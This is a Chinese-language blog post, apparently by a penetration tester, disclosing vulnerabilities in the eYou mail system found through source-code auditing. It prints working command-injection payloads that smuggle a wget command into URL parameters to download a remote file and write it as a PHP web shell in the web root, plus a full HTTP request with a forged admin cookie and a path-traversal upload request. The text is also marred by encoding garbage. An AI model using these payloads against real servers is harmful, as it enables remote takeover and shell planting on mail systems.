|
顯示不全請(qǐng)點(diǎn)擊全屏閱讀
最近在給一家市值過(guò)百億美金的公司做滲透測(cè)試�,發(fā)現(xiàn)其中一個(gè)域名用的億郵郵件系統(tǒng),就順便下了套億郵的源碼看了看�����,發(fā)現(xiàn)這套系統(tǒng)的安全性還停留在零幾年���,問(wèn)題一大堆�����,找到一些getshell���,簡(jiǎn)單列兩個(gè),再擰兩個(gè)稍微有意思的漏洞分享一下����,就不寫詳細(xì)分析了����。
另外過(guò)段時(shí)間會(huì)更新一版代碼審計(jì)系統(tǒng)����,會(huì)加幾種漏洞類型的審計(jì)規(guī)則,還有優(yōu)化誤報(bào)�。這次發(fā)現(xiàn)億郵的所有漏洞都是Seay源代碼審計(jì)系統(tǒng)自動(dòng)化挖掘到的。
命令執(zhí)行1
http:///swfupload/upload_files.php?uid=
|wget+http://www./1.txt+-O+/var/eyou/apache/htdocs/swfupload/a.php&domain=
命令執(zhí)行2 GET /admin/domain/ip_login_set/d_ip_login_get.php?allow=allow&type=deny&domain=|wget+http://www./1.txt+-O+/var/eyou/apache/htdocs/grad/admin/a.php HTTP/1.1
Host: mail.
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Length: 0
cookie: cookie=admin 1
DNT: 1
Connection: keep-alive 
任意文件上傳
Swfupload/upload_files.php? uid=admin&token=youtoken/../../ 
這里本來(lái)可以無(wú)需登陸直接上傳任意文件的����,但是在linux下,is_dir()函數(shù)判斷一個(gè)路徑是否是目錄����,在用../跳轉(zhuǎn)目錄時(shí),必須路徑中的目錄都存在�,但是windows下面可以是不存在的路徑,到底是系統(tǒng)問(wèn)題還是php問(wèn)題�����,這個(gè)等有時(shí)間再去研究���。
看看這個(gè)圖就明白了 
很多文件頭頂還有一個(gè)文件包含��,但是是http頭里面的host字段�����,在網(wǎng)站是默認(rèn)情況下���,這個(gè)host是可以偽造的,但是不能有斜杠這域名中不存在的字符�,否則會(huì)400錯(cuò)誤,所以這里只能包含同目錄下面的文件�。 
|
